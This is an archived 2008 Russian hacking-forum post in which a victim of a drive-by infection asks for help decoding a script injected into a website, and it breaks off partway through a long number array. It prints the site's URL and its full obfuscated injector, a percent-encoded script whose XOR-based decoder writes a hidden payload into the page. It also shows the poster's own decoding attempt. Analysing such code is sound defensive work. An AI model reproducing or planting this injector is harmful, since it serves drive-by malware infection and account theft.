Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Нужна пoмoщь в расшифровке скрипта/эксплоита

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Веб-программинг] >> Нужна пoмoщь в расшифровке скрипта/эксплоита

Имя

Сообщение

<< Старые топики Новые топики >>

Нужна пoмoщь в расшифровке скрипта/эксплоита - 2008-01-08 05:18:59.396666

voody

Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30

Модераторам: я не знал, куда эту тему лучше поместить, решил сюда. Переместите ее в более подходящий раздел, если сочтете необходимым.

Всем привет. Сначала немного предыстории.

Сегодня днем один мой знакомый прислал мне приглашение в группу (в ВКонтакте.ру), в заголовке этой группы был адрес сайта. Зачем я только туда зашел … тем более, с IE … Короче, там я подхватил троян Win32.Grum.D и еще какую-то хрень, которая определилась, как прога для отсылки спама (оригинальные exe'шники я сохранил, если кто-то сможет дать мне более подробную информацию, что они делают - я с удовольствием пошлю их этому человеку). Трояны я (надеюсь) удалил, но, не все было так просто. У меня угнали Аську. Шестизнак. Очень обидно. Красивый был (638-036). Плюс, у меня там была куча важных контактов, в том числе, и по работе. В том, что это произошло из-за трояна - у меня сомнений нет. Так, вот, Аську мне уже вернуть почти не реально, я сейчас хочу попытаться узнать, откуда вообще, так сказать, ноги растут, т.е., расшифровать код эксплоита и понять, откуда и что, вообще, загружалось. В крайнем случае, я, хотя бы, напишу письмо хостеру с просьбой прикрыть сайт.

Теперь, ближе к делу.
Адрес сайта: http://www.bigbluesrevival.ru/
В конце исходного кода можно заметить строки:

&lt;!-- dfbf44e3a251fe4281d671f4b6aca0d2 --&gt;&lt;script&gt;document.write(unescape("%3Cscript%3Efunction%20fe2ngk%28oz9skw%29%7Bvar%20c6b2th%3Dnew%20String%28arguments.callee%29%3Bc6b2th%3Dc6b2th.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Cn4v2ux%3D0%2Ctlj2gv%3D0%2Cnw037y%3D%27%27%2Cdxf47z%3D0%3Bfor%28var%20lukv4w%3D0%3Blukv4w%3Cc6b2th.length%3Blukv4w++%29dxf47z+%3Dc6b2th.charCodeAt%28lukv4w%2C1%29%3Bfor%28n4v2ux%3D0%3Bn4v2ux%3Coz9skw.length%3Bn4v2ux++%29%7Bvar%20mpm2xz%3Doz9skw%5Bn4v2ux%5D%2Cy8o1ip%3Dc6b2th.substr%28tlj2gv%2C1%29.charCodeAt%280%29%5Edxf47z%3Bnw037y+%3DString.fromCharCode%28mpm2xz%5Ey8o1ip%29%3Btlj2gv++%3Bif%28tlj2gv%3D%3Dc6b2th.length%29tlj2gv%3D0%7Ddocument.write%28nw037y%29%3Bnw037y%3D%27%27%7Dfe2ngk%28new%20Array%2829808%2C29740%2C29735%2C29755%2C29751%2C29747%2C29745%2C29818%2C29761%2C29765%2C29803%2C29744%2C29759%2C29736%2C29772%2C29730%2C29822%2C29763%2C29739%2C29742%2C29737%2C29772%2C29736%2C29746%2C29736%2C29740%2C29714%2C29705%2C29790%2C29717%2C29701%2C29729%2C29752%2C29741%2C29723%2C29748%2C29816%2C29822%2C29796%2C29739%2C29783%2C29733%2C29755%2C29753%2C29750%2C29736%2C29729%2C29804%2C29815%2C29817%2C29791%2C29801%2C29757%2C29735%2C29748%2C29807%2C29755%2C29726%2C29757%2C29780%2C29729%2C29771%2C29810%2C29794%2C29734%2C29697%2C29807%2C29727%2C29797%2C29794%2C29762%2C29751%2C29757%2C29810%2C29744%2C29738%2C29755%2C29807%2C29771%2C29814%2C29779%2C29822%2C29782%2C29762%2C29789%2C29765%2C29783%2C29769%2C29806%2C29700%2C29775%2C29721%2C29724%2C29811%2C29814%2C29702%2C29770%2C29705%2C29811%2C29804%2C29823%2C29749%2C29809%2C29810%2C29740%2C29799%2C29752%2C29740%2C29741%2C29777%2C29783%2C29780%2C29804%2C29783%2C29808%2C29705%2C29814%2C29801%2C29722%2C29780%2C29755%2C29746%2C29749%2C29770%2C29731%2C29820%2C29781%2C29725%2C29796%2C29728%2C29751%2C29747%2C29787%2C29734%2C29768%2C29741%2C29734%2C29733%2C29777%2C29779%2C29808%2C29807%2C29722%2C29748%2C29744%2C29807%2C29722%2C29755%2C29707%2C29698%2C29740%2C29699%2C29812%2C29719%2C29734%2C29767%2C29771%2C29781%2C29716%2C29706%2C29775%2C29749%2C29700%2C29818%2C29752%2C29803%2C29722%2C29745%2C29798%2C29800%2C29759%2C29750%2C29730%2C29738%2C29741%2C29746%2C29734%2C29745%2C29753%2C29726%2C29792%2C29697%2C29786%2C29742%2C29764%2C29791%2C29766%2C29751%2C29781%2C29759%2C29778%2C29757%2C29702%2C29807%2C29782%2C29757%2C29804%2C29712%2C29734%2C29744%2C29742%2C29753%2C29799%2C29747%2C29739%2C29739%2C29804%2C29808%2C29795%2C29728%2C29716%2C29702%2C29753%2C29769%2C29741%2C29796%2C29777%2C29707%2C29797%2C29801%2C29736%2C29763%2C29744%2C29782%2C29798%2C29727%2C29808%2C29756%2C29785%2C29802%2C29785%2C29746%2C29777%2C29739%2C29729%2C29738%2C29752%2C29726%2C29751%2C29736%2C29756%2C29769%2C29801%2C29800%2C29802%2C29708%2C29752%2C29705%2C29699%2C29787%2C29739%2C29768%2C29725%2C29752%2C29705%2C29704%2C29711%2C29759%2C29732%2C29751%2C29740%2C29747%2C29730%2C29814%2C29747%2C29757%2C29728%2C29802%2C29716%2C29757%2C29728%2C29739%2C29750%2C29706%2C29819%2C29716%2C29756%2C29757%2C29769%2C29752%2C29787%2C29728%2C29805%2C29730%2C29750%2C29756%2C29785%2C29810%2C29705%2C29810%2C29775%2C29742%2C29780%2C29781%2C29761%2C29744%2C29744%2C29739%2C29782%2C29759%2C29738%2C29740%2C29720%2C29815%2C29820%2C29760%2C29774%2C29773%2C29767%2C29757%2C29739%2C29732%2C29750%2C29793%2C29804%2C29763%2C29765%2C29762%2C29733%2C29743%2C29744%2C29738%2C29767%2C29755%2C29738%2C29718%2C29724%2C29732%2C29740%2C29748%2C29769%2C29719%2C29788%2C29759%2C29779%2C29756%2C29759%2C29756%2C29754%2C29709%2C29731%2C29783%2C29752%2C29753%2C29737%2C29739%2C29740%2C29734%2C29795%2C29809%2C29792%2C29768%2C29764%2C29766%2C29739%2C29756%2C29783%2C29773%2C29745%2C29787%2C29785%2C29733%2C29779%2C29751%2C29723%2C29744%2C29818%2C29726%2C29822%2C29796%2C29820%2C29777%2C29739%2C29742%2C29760%2C29772%2C29734%2C29804%2C29781%2C29751%2C29730%2C29748%2C29776%2C29808%2C29805%2C29801%2C29780%2C29741%2C29777%2C29753%2C29738%2C29776%2C29819%2C29822%2C29796%2C29739%2C29740%2C29731%2C29774%2C29755%2C29700%2C29743%2C29770%2C29737%2C29753%2C29768%2C29811%2C29813%2C29801%2C29740%2C29749%2C29740%2C29817%2C29817%2C29702%2C29821%2C29811%2C29795%2C29738%2C29735%2C29771%2C29751%2C29811%2C29789%2C29788%2C29769%2C29717%2C29777%2C29733%2C29744%2C29791%2C29804%2C29807%2C29727%2C29796%2C29814%2C29796%2C29794%2C29822%2C29793%2C29794%2C29818%2C29808%2C29792%2C29777%2C29730%2C29759%2C29728%2C29775%2C29728%2C29806%2C29713%2C29794%2C29772%2C29783%2C29738%2C29781%2C29762%2C29740%2C29755%2C29765%2C29800%2C29763%2C29822%2C29734%2C29739%2C29740%2C29736%2C29748%2C29755%2C29750%2C29751%2C29802%2C29754%2C29776%2C29730%2C29740%2C29736%2C29815%2C29748%2C29798%2C29796%2C29731%2C29780%2C29742%2C29760%2C29762%2C29775%2C29733%2C29742%2C29755%2C29760%2C29729%2C29716%2C29741%2C29713%2C29733%2C29794%2C29741%2C29779%2C29739%2C29773%2C29747%2C29735%2C29770%2C29740%2C29793%2C29741%2C29748%2C29730%2C29757%2C29738%2C29706%2C29801%2C29723%2C29752%2C29774%2C29770%2C29791%2C29724%2C29727%2C29763%2C29754%2C29760%2C29791%2C29721%2C29699%2C29795%2C29798%2C29702%2C29776%2C29700%2C29813%2C29797%2C29821%2C29798%2C29813%2C29741%2C29751%2C29741%2C29746%2C29799%2C29811%2C29709%2C29771%2C29778%2C29737%2C29778%2C29794%2C29722%2C29814%2C29810%2C29767%2C29739%2C29780%2C29775%2C29769%2C29745%2C29753%2C29748%2C29779%2C29781%2C29802%2C29742%2C29791%2C29773%2C29822%2C29756%2C29769%2C29733%2C29755%2C29737%2C29718%2C29769%2C29752%2C29779%2C29759%2C29803%2C29755%2C29773%2C29747%2C29728%2C29745%2C29731%2C29713%2C29728%2C29745%2C29787%2C29809%2C29722%2C29746%2C29751%2C29736%2C29743%2C29712%2C29758%2C29734%2C29779%2C29731%2C29777%2C29755%2C29716%2C29765%2C29738%2C29754%2C29729%2C29796%2C29797%2C29771%2C29771%2C29781%2C29768%2C29781%2C29763%2C29776%2C29739%2C29736%2C29790%2C29794%2C29791%2C29766%2C29751%2C29774%2C29749%2C29781%2C29706%2C29779%2C29735%2C29779%2C29751%2C29735%2C29700%2C29811%2C29794%2C29741%2C29741%2C29735%2C29734%2C29754%2C29734%2C29732%2C29744%2C29706%2C29736%2C29758%2C29740%2C29753%2C29714%2C29821%2C29776%2C29786%2C29775%2C29753%2C29728%2C29809%2C29743%2C29774%2C29751%2C29735%2C29749%2C29781%2C29787%2C29747%2C29746%2C29791%2C29742%2C29720%2C29755%2C29807%2C29797%2C29758%2C29782%2C29742%2C29793%2C29721%2C29765%2C29746%2C29738%2C29804%2C29796%2C29797%2C29794%2C29728%2C29712%2C29743%2C29789%2C29739%2C29702%2C29768%2C29772%2C29766%2C29812%2C29733%2C29757%2C29744%2C29818%2C29699%2C29785%2C29734%2C29749%2C29805%2C29817%2C29725%2C29758%2C29732%2C29737%2C29712%2C29783%2C29745%2C29789%2C29815%2C29819%2C29702%2C29816%2C29714%2C29821%2C29709%2C29815%2C29802%2C29817%2C29708%2C29816%2C29704%2C29815%2C29817%2C29700%2C29780%2C29781%2C29761%2C29776%2C29754%2C29751%2C29761%2C29739%2C29739%2C29733%2C29782%2C29753%2C29810%2C29765%2C29780%2C29772%2C29775%2C29728%2C29735%2C29803%2C29797%2C29801%2C29739%2C29743%2C29730%2C29742%2C29822%2C29705%2C29722%2C29697%2C29811%2C29808%2C29804%2C29717%2C29725%2C29749%2C29751%2C29758%2C29787%2C29769%2C29784%2C29819%2C29783%2C29752%2C29746%2C29741%2C29734%2C29805%2C29805%2C29711%2C29804%2C29818%2C29822%2C29799%2C29740%2C29754%2C29755%2C29745%2C29755%2C29728%2C29757%2C29810%2C29696%2C29799%2C29809%2C29799%2C29788%2C29820%2C29732%2C29756%2C29813%2C29704%2C29807%2C29712%2C29742%2C29777%2C29751%2C29736%2C29735%2C29712%2C29796%2C29799%2C29697%2C29736%2C29770%2C29765%2C29743%2C29780%2C29775%2C29757%2C29716%2C29760%2C29782%2C29760%2C29789%2C29732%2C29770%2C29755%2C29731%2C29760%2C29759%2C29702%2C29738%2C29758%2C29738%2C29731%2C29775%2C29746%2C29731%2C29732%2C29720%2C29815%2C29820%2C29788%2C29755%2C29739%2C29738%2C29739%2C29742%2C29728%2C29738%2C29814%2C29709%2C29776%2C29778%2C29770%2C29733%2C29762%2C29736%2C29773%2C29780%2C29768%2C29788%2C29769%2C29734%2C29777%2C29738%2C29821%2C29723%2C29713%2C29785%2C29756%2C29743%2C29738%2C29737%2C29740%2C29744%2C29751%2C29803%2C29735%2C29731%2C29728%2C29779%2C29741%2C29736%2C29807%2C29771%2C29739%2C29748%2C29782%2C29729%2C29710%2C29755%2C29707%2C29736%2C29731%2C29745%2C29754%2C29714%2C29739%2C29783%2C29745%2C29737%2C29741%2C29738%2C29715%2C29752%2C29747%2C29757%2C29795%2C29807%2C29805%2C29701%2C29814%2C29823%2C29805%2C29812%2C29799%2C29755%2C29740%2C29751%2C29738%2C29706%2C29738%2C29732%2C29737%2C29741%2C29734%2C29738%2C29813%2C29736%2C29776%2C29757%2C29789%2C29815%2C29794%2C29812%2C29697%2C29800%2C29717%2C29807%2C29803%2C29727%2C29781%2C29765%2C29779%2C29755%2C29799%2C29764%2C29765%2C29739%2C29740%2C29762%2C29732%2C29820%2C29781%2C29778%2C29775%2C29766%2C29812%2C29703%2C29800%2C29702%2C29725%2C29697%2C29733%2C29752%2C29768%2C29760%2C29776%2C29751%2C29738%2C29745%2C29810%2C29811%2C29762%2C29778%2C29760%2C29744%2C29780%2C29765%2C29739%2C29738%2C29776%2C29733%2C29772%2C29820%2C29788%2C29747%2C29754%2C29703%2C29762%2C29745%2C29733%2C29749%2C29781%2C29736%2C29746%2C29774%2C29704%2C29736%2C29746%2C29785%2C29784%2C29769%2C29754%2C29769%2C29728%2C29820%2C29732%2C29777%2C29774%2C29732%2C29697%2C29804%2C29768%2C29778%2C29739%2C29781%2C29753%2C29757%2C29746%2C29738%2C29747%2C29746%2C29726%2C29818%2C29778%2C29746%2C29739%2C29745%2C29798%2C29713%2C29810%2C29806%2C29724%2C29795%2C29720%2C29814%2C29802%2C29760%2C29738%2C29735%2C29796%2C29808%2C29795%2C29794%2C29793%2C29816%2C29793%2C29728%2C29762%2C29821%2C29765%2C29773%2C29771%2C29806%2C29807%2C29809%2C29726%2C29722%2C29733%2C29775%2C29741%2C29785%2C29742%2C29777%2C29744%2C29735%2C29760%2C29806%2C29803%2C29803%2C29799%2C29801%2C29745%2C29734%2C29734%2C29752%2C29808%2C29765%2C29731%2C29739%2C29715%2C29757%2C29776%2C29753%2C29813%2C29775%2C29777%2C29733%2C29739%2C29759%2C29706%2C29805%2C29726%2C29798%2C29720%2C29816%2C29813%2C29715%2C29796%2C29717%2C29820%2C29788%2C29747%2C29754%2C29803%2C29730%2C29782%2C29737%2C29741%2C29756%2C29767%2C29731%2C29807%2C29804%2C29794%2C29701%2C29724%2C29733%2C29715%2C29734%2C29704%2C29810%2C29803%2C29711%2C29708%2C29822%2C29811%2C29799%2C29823%2C29801%2C29821%2C29806%2C29718%2C29728%2C29749%2C29749%2C29756%2C29778%2C29754%2C29732%2C29821%2C29804%2C29713%2C29696%2C29718%2C29812%2C29821%2C29706%2C29812%2C29724%2C29794%2C29714%2C29795%2C29818%2C29794%2C29724%2C29802%2C29718%2C29820%2C29794%2C29711%2C29817%2C29739%2C29728%2C29744%2C29741%2C29814%2C29765%2C29755%2C29746%2C29714%2C29785%2C29731%2C29752%2C29813%2C29775%2C29777%2C29773%2C29735%2C29733%2C29795%2C29809%2C29801%2C29806%2C29806%2C29805%2C29797%2C29820%2C29698%2C29713%2C29699%2C29754%2C29754%2C29733%2C29773%2C29715%2C29752%2C29739%2C29742%2C29774%2C29721%2C29718%2C29811%2C29781%2C29745%2C29751%2C29739%2C29805%2C29748%2C29740%2C29776%2C29732%2C29795%2C29768%2C29773%2C29760%2C29759%2C29799%2C29781%2C29763%2C29772%2C29737%2C29738%2C29782%2C29717%2C29755%2C29737%2C29788%2C29697%2C29732%2C29729%2C29787%2C29739%2C29788%2C29795%2C29792%2C29699%2C29752%2C29747%2C29742%2C29787%2C29753%2C29749%2C29774%2C29775%2C29803%2C29797%2C29743%2C29780%2C29775%2C29755%2C29749%2C29767%2C29781%2C29760%2C29770%2C29737%2C29770%2C29822%2C29742%2C29721%2C29815%2C29817%2C29800%2C29805%2C29757%2C29823%2C29699%2C29817%2C29814%2C29809%2C29706%2C29822%2C29800%2C29711%2C29816%2C29810%2C29809%2C29798%2C29734%2C29741%2C29735%2C29754%2C29761%2C29755%2C29823%2C29807%2C29822%2C29728%2C29727%2C29795%2C29818%2C29697%2C29721%2C29787%2C29756%2C29777%2C29796%2C29813%2C29772%2C29784%2C29775%2C29811%2C29733%2C29794%2C29812%2C29810%2C29822%2C29738%2C29797%2C29816%2C29804%2C29731%2C29699%2C29796%2C29732%2C29802%2C29705%2C29804%2C29808%2C29788%2C29810%2C29820%2C29758%2C29709%2C29743%2C29758%2C29754%2C29754%2C29768%2C29754%2C29720%2C29814%2C29711%2C29733%2C29755%2C29749%2C29815%2C29752%2C29748%2C29740%2C29739%2C29759%2C29706%2C29702%2C29753%2C29753%2C29751%2C29801%2C29757%2C29733%2C29744%2C29757%2C29771%2C29732%2C29795%2C29807%2C29798%2C29797%2C29807%2C29760%2C29799%2C29776%2C29741%2C29782%2C29753%2C29750%2C29729%2C29717%2C29796%2C29720%2C29807%2C29806%2C29700%2C29801%2C29798%2C29793%2C29771%2C29761%2C29760%2C29766%2C29776%2C29742%2C29779%2C29733%2C29768%2C29769%2C29715%2C29773%2C29720%2C29740%2C29791%2C29741%2C29787%2C29742%2C29740%2C29769%2C29744%2C29739%2C29737%2C29778%2C29759%2C29751%2C29823%2C29749%2C29818%2C29810%2C29816%2C29735%2C29742%2C29742%2C29807%2C29815%2C29813%2C29783%2C29740%2C29811%2C29722%2C29768%2C29708%2C29718%2C29769%2C29796%2C29814%2C29807%2C29819%2C29720%2C29730%2C29810%2C29779%2C29768%2C29751%2C29737%2C29787%2C29781%2C29777%2C29819%2C29711%2C29813%2C29791%2C29766%2C29698%2C29714%2C29731%2C29785%2C29758%2C29740%2C29736%2C29782%2C29794%29%29%3C/script%3E"))&lt;/script&gt;&lt;!--/--&gt;

Очень содержательный комментарий к скрипту, не правда ли? :)
После расшифровки у меня получилось вот, что:

&lt;script&gt;function fe2ngk(oz9skw){var c6b2th=new String(arguments.callee);c6b2th=c6b2th.replace(/[^a-z0-9()+_\.,-]+/ig, "").toUpperCase(),n4v2ux=0,tlj2gv=0,nw037y='',dxf47z=0;for(var lukv4w=0;lukv4w&lt;c6b2th.length;lukv4w++)dxf47z+=c6b2th.charCodeAt(lukv4w,1);for(n4v2ux=0;n4v2ux&lt;oz9skw.length;n4v2ux++){var mpm2xz=oz9skw[n4v2ux],y8o1ip=c6b2th.substr(tlj2gv,1).charCodeAt(0)^dxf47z;nw037y+=String.fromCharCode(mpm2xz^y8o1ip);tlj2gv++;if(tlj2gv==c6b2th.length)tlj2gv=0}document.write(nw037y);nw037y=''}fe2ngk(new Array(29808,29740,29735,29755,29751,29747,29745,29818,29761,29765,29803,29744,29759,29736,29772,29730,29822,29763,29739,29742,29737,29772,29736,29746,29736,29740,29714,29705,29790,29717,29701,29729,29752,29741,29723,29748,29816,29822,29796,29739,29783,29733,29755,29753,29750,29736,29729,29804,29815,29817,29791,29801,29757,29735,29748,29807,29755,29726,29757,29780,29729,29771,29810,29794,29734,29697,29807,29727,29797,29794,29762,29751,29757,29810,29744,29738,29755,29807,29771,29814,29779,29822,29782,29762,29789,29765,29783,29769,29806,29700,29775,29721,29724,29811,29814,29702,29770,29705,29811,29804,29823,29749,29809,29810,29740,29799,29752,29740,29741,29777,29783,29780,29804,29783,29808,29705,29814,29801,29722,29780,29755,29746,29749,29770,29731,29820,29781,29725,29796,29728,29751,29747,29787,29734,29768,29741,29734,29733,29777,29779,29808,29807,29722,29748,29744,29807,29722,29755,29707,29698,29740,29699,29812,29719,29734,29767,29771,29781,29716,29706,29775,29749,29700,29818,29752,29803,29722,29745,29798,29800,29759,29750,29730,29738,29741,29746,29734,29745,29753,29726,29792,29697,29786,29742,29764,29791,29766,29751,29781,29759,29778,29757,29702,29807,29782,29757,29804,29712,29734,29744,29742,29753,29799,29747,29739,29739,29804,29808,29795,29728,29716,29702,29753,29769,29741,29796,29777,29707,29797,29801,29736,29763,29744,29782,29798,29727,29808,29756,29785,29802,29785,29746,29777,29739,29729,29738,29752,29726,29751,29736,29756,29769,29801,29800,29802,29708,29752,29705,29699,29787,29739,29768,29725,29752,29705,29704,29711,29759,29732,29751,29740,29747,29730,29814,29747,29757,29728,29802,29716,29757,29728,29739,29750,29706,29819,29716,29756,29757,29769,29752,29787,29728,29805,29730,29750,29756,29785,29810,29705,29810,29775,29742,29780,29781,29761,29744,29744,29739,29782,29759,29738,29740,29720,29815,29820,29760,29774,29773,29767,29757,29739,29732,29750,29793,29804,29763,29765,29762,29733,29743,29744,29738,29767,29755,29738,29718,29724,29732,29740,29748,29769,29719,29788,29759,29779,29756,29759,29756,29754,29709,29731,29783,29752,29753,29737,29739,29740,29734,29795,29809,29792,29768,29764,29766,29739,29756,29783,29773,29745,29787,29785,29733,29779,29751,29723,29744,29818,29726,29822,29796,29820,29777,29739,29742,29760,29772,29734,29804,29781,29751,29730,29748,29776,29808,29805,29801,29780,29741,29777,29753,29738,29776,29819,29822,29796,29739,29740,29731,29774,29755,29700,29743,29770,29737,29753,29768,29811,29813,29801,29740,29749,29740,29817,29817,29702,29821,29811,29795,29738,29735,29771,29751,29811,29789,29788,29769,29717,29777,29733,29744,29791,29804,29807,29727,29796,29814,29796,29794,29822,29793,29794,29818,29808,29792,29777,29730,29759,29728,29775,29728,29806,29713,29794,29772,29783,29738,29781,29762,29740,29755,29765,29800,29763,29822,29734,29739,29740,29736,29748,29755,29750,29751,29802,29754,29776,29730,29740,29736,29815,29748,29798,29796,29731,29780,29742,29760,29762,29775,29733,29742,29755,29760,29729,29716,29741,29713,29733,29794,29741,29779,29739,29773,29747,29735,29770,29740,29793,29741,29748,29730,29757,29738,29706,29801,29723,29752,29774,29770,29791,29724,29727,29763,29754,29760,29791,29721,29699,29795,29798,29702,29776,29700,29813,29797,29821,29798,29813,29741,29751,29741,29746,29799,29811,29709,29771,29778,29737,29778,29794,29722,29814,29810,29767,29739,29780,29775,29769,29745,29753,29748,29779,29781,29802,29742,29791,29773,29822,29756,29769,29733,29755,29737,29718,29769,29752,29779,29759,29803,29755,29773,29747,29728,29745,29731,29713,29728,29745,29787,29809,29722,29746,29751,29736,29743,29712,29758,29734,29779,29731,29777,29755,29716,29765,29738,29754,29729,29796,29797,29771,29771,29781,29768,29781,29763,29776,29739,29736,29790,29794,29791,29766,29751,29774,29749,29781,29706,29779,29735,29779,29751,29735,29700,29811,29794,29741,29741,29735,29734,29754,29734,29732,29744,29706,29736,29758,29740,29753,29714,29821,29776,29786,29775,29753,29728,29809,29743,29774,29751,29735,29749,29781,29787,29747,29746,29791,29742,29720,29755,29807,29797,29758,29782,29742,29793,29721,29765,29746,29738,29804,29796,29797,29794,29728,29712,29743,29789,29739,29702,29768,29772,29766,29812,29733,29757,29744,29818,29699,29785,29734,29749,29805,29817,29725,29758,29732,29737,29712,29783,29745,29789,29815,29819,29702,29816,29714,29821,29709,29815,29802,29817,29708,29816,29704,29815,29817,29700,29780,29781,29761,29776,29754,29751,29761,29739,29739,29733,29782,29753,29810,29765,29780,29772,29775,29728,29735,29803,29797,29801,29739,29743,29730,29742,29822,29705,29722,29697,29811,29808,29804,29717,29725,29749,29751,29758,29787,29769,29784,29819,29783,29752,29746,29741,29734,29805,29805,29711,29804,29818,29822,29799,29740,29754,29755,29745,29755,29728,29757,29810,29696,29799,29809,29799,29788,29820,29732,29756,29813,29704,29807,29712,29742,29777,29751,29736,29735,29712,29796,29799,29697,29736,29770,29765,29743,29780,29775,29757,29716,29760,29782,29760,29789,29732,29770,29755,29731,29760,29759,29702,29738,29758,29738,29731,29775,29746,29731,29732,29720,29815,29820,29788,29755,29739,29738,29739,29742,29728,29738,29814,29709,29776,29778,29770,29733,29762,29736,29773,29780,29768,29788,29769,29734,29777,29738,29821,29723,29713,29785,29756,29743,29738,29737,29740,29744,29751,29803,29735,29731,29728,29779,29741,29736,29807,29771,29739,29748,29782,29729,29710,29755,29707,29736,29731,29745,29754,29714,29739,29783,29745,29737,29741,29738,29715,29752,29747,29757,29795,29807,29805,29701,29814,29823,29805,29812,29799,29755,29740,29751,29738,29706,29738,29732,29737,29741,29734,29738,29813,29736,29776,29757,29789,29815,29794,29812,29697,29800,29717,29807,29803,29727,29781,29765,29779,29755,29799,29764,29765,29739,29740,29762,29732,29820,29781,29778,29775,29766,29812,29703,29800,29702,29725,29697,29733,29752,29768,29760,29776,29751,29738,29745,29810,29811,29762,29778,29760,29744,29780,29765,29739,29738,29776,29733,29772,29820,29788,29747,29754,29703,29762,29745,29733,29749,29781,29736,29746,29774,29704,29736,29746,29785,29784,29769,29754,29769,29728,29820,29732,29777,29774,29732,29697,29804,29768,29778,29739,29781,29753,29757,29746,29738,29747,29746,29726,29818,29778,29746,29739,29745,29798,29713,29810,29806,29724,29795,29720,29814,29802,29760,29738,29735,29796,29808,29795,29794,29793,29816,29793,29728,29762,29821,29765,29773,29771,29806,29807,29809,29726,29722,29733,29775,29741,29785,29742,29777,29744,29735,29760,29806,29803,29803,29799,29801,29745,29734,29734,29752,29808,29765,29731,29739,29715,29757,29776,29753,29813,29775,29777,29733,29739,29759,29706,29805,29726,29798,29720,29816,29813,29715,29796,29717,29820,29788,29747,29754,29803,29730,29782,29737,29741,29756,29767,29731,29807,29804,29794,29701,29724,29733,29715,29734,29704,29810,29803,29711,29708,29822,29811,29799,29823,29801,29821,29806,29718,29728,29749,29749,29756,29778,29754,29732,29821,29804,29713,29696,29718,29812,29821,29706,29812,29724,29794,29714,29795,29818,29794,29724,29802,29718,29820,29794,29711,29817,29739,29728,29744,29741,29814,29765,29755,29746,29714,29785,29731,29752,29813,29775,29777,29773,29735,29733,29795,29809,29801,29806,29806,29805,29797,29820,29698,29713,29699,29754,29754,29733,29773,29715,29752,29739,29742,29774,29721,29718,29811,29781,29745,29751,29739,29805,29748,29740,29776,29732,29795,29768,29773,29760,29759,29799,29781,29763,29772,29737,29738,29782,29717,29755,29737,29788,29697,29732,29729,29787,29739,29788,29795,29792,29699,29752,29747,29742,29787,29753,29749,29774,29775,29803,29797,29743,29780,29775,29755,29749,29767,29781,29760,29770,29737,29770,29822,29742,29721,29815,29817,29800,29805,29757,29823,29699,29817,29814,29809,29706,29822,29800,29711,29816,29810,29809,29798,29734,29741,29735,29754,29761,29755,29823,29807,29822,29728,29727,29795,29818,29697,29721,29787,29756,29777,29796,29813,29772,29784,29775,29811,29733,29794,29812,29810,29822,29738,29797,29816,29804,29731,29699,29796,29732,29802,29705,29804,29808,29788,29810,29820,29758,29709,29743,29758,29754,29754,29768,29754,29720,29814,29711,29733,29755,29749,29815,29752,29748,29740,29739,29759,29706,29702,29753,29753,29751,29801,29757,29733,29744,29757,29771,29732,29795,29807,29798,29797,29807,29760,29799,29776,29741,29782,29753,29750,29729,29717,29796,29720,29807,29806,29700,29801,29798,29793,29771,29761,29760,29766,29776,29742,29779,29733,29768,29769,29715,29773,29720,29740,29791,29741,29787,29742,29740,29769,29744,29739,29737,29778,29759,29751,29823,29749,29818,29810,29816,29735,29742,29742,29807,29815,29813,29783,29740,29811,29722,29768,29708,29718,29769,29796,29814,29807,29819,29720,29730,29810,29779,29768,29751,29737,29787,29781,29777,29819,29711,29813,29791,29766,29698,29714,29731,29785,29758,29740,29736,29782,29794))&lt;/script&gt;

На этом расшифровка закончилась, т.к., этот код выдавал ошибку:


 var FSO = new ActiveXObject("Scripting.FileSystemObject");
 var Out = FSO.CreateTextFile("C:\\Out.txt");
 
 function fe2ngk(oz9skw) {
 	var c6b2th = new String(arguments.callee);
 	c6b2th = c6b2th.replace(/[^a-z0-9()+_\.,-]+/ig, "").toUpperCase();
 	n4v2ux=0;
 	tlj2gv=0;
 	nw037y='';
 	dxf47z=0;
 	for (var lukv4w=0; lukv4w &lt; c6b2th.length; lukv4w++) dxf47z+=c6b2th.charCodeAt(lukv4w,1);
 	for(n4v2ux=0; n4v2ux&lt;oz9skw.length; n4v2ux++) {
 		var mpm2xz = oz9skw[n4v2ux];
 		y8o1ip = c6b2th.substr(tlj2gv,1).charCodeAt(0)^dxf47z;           
 		nw037y += String.fromCharCode(mpm2xz^y8o1ip);
 		tlj2gv++;
 		if (tlj2gv == c6b2th.length) tlj2gv = 0;
 	}
 	Out.Write(nw037y);
 	nw037y='';
 }
 
 fe2ngk(new Array(29808,29740,29735,29755,29751,29747,29745,29818,29761,29765,29803,29744,29759,29736,29772,29730,29822,29763,29739,29742,29737,29772,29736,29746,29736,29740,29714,29705,29790,29717,29701,29729,29752,29741,29723,29748,29816,29822,29796,29739,29783,29733,29755,29753,29750,29736,29729,29804,29815,29817,29791,29801,29757,29735,29748,29807,29755,29726,29757,29780,29729,29771,29810,29794,29734,29697,29807,29727,29797,29794,29762,29751,29757,29810,29744,29738,29755,29807,29771,29814,29779,29822,29782,29762,29789,29765,29783,29769,29806,29700,29775,29721,29724,29811,29814,29702,29770,29705,29811,29804,29823,29749,29809,29810,29740,29799,29752,29740,29741,29777,29783,29780,29804,29783,29808,29705,29814,29801,29722,29780,29755,29746,29749,29770,29731,29820,29781,29725,29796,29728,29751,29747,29787,29734,29768,29741,29734,29733,29777,29779,29808,29807,29722,29748,29744,29807,29722,29755,29707,29698,29740,29699,29812,29719,29734,29767,29771,29781,29716,29706,29775,29749,29700,29818,29752,29803,29722,29745,29798,29800,29759,29750,29730,29738,29741,29746,29734,29745,29753,29726,29792,29697,29786,29742,29764,29791,29766,29751,29781,29759,29778,29757,29702,29807,29782,29757,29804,29712,29734,29744,29742,29753,29799,29747,29739,29739,29804,29808,29795,29728,29716,29702,29753,29769,29741,29796,29777,29707,29797,29801,29736,29763,29744,29782,29798,29727,29808,29756,29785,29802,29785,29746,29777,29739,29729,29738,29752,29726,29751,29736,29756,29769,29801,29800,29802,29708,29752,29705,29699,29787,29739,29768,29725,29752,29705,29704,29711,29759,29732,29751,29740,29747,29730,29814,29747,29757,29728,29802,29716,29757,29728,29739,29750,29706,29819,29716,29756,29757,29769,29752,29787,29728,29805,29730,29750,29756,29785,29810,29705,29810,29775,29742,29780,29781,29761,29744,29744,29739,29782,29759,29738,29740,29720,29815,29820,29760,29774,29773,29767,29757,29739,29732,29750,29793,29804,29763,29765,29762,29733,29743,29744,29738,29767,29755,29738,29718,29724,29732,29740,29748,29769,29719,29788,29759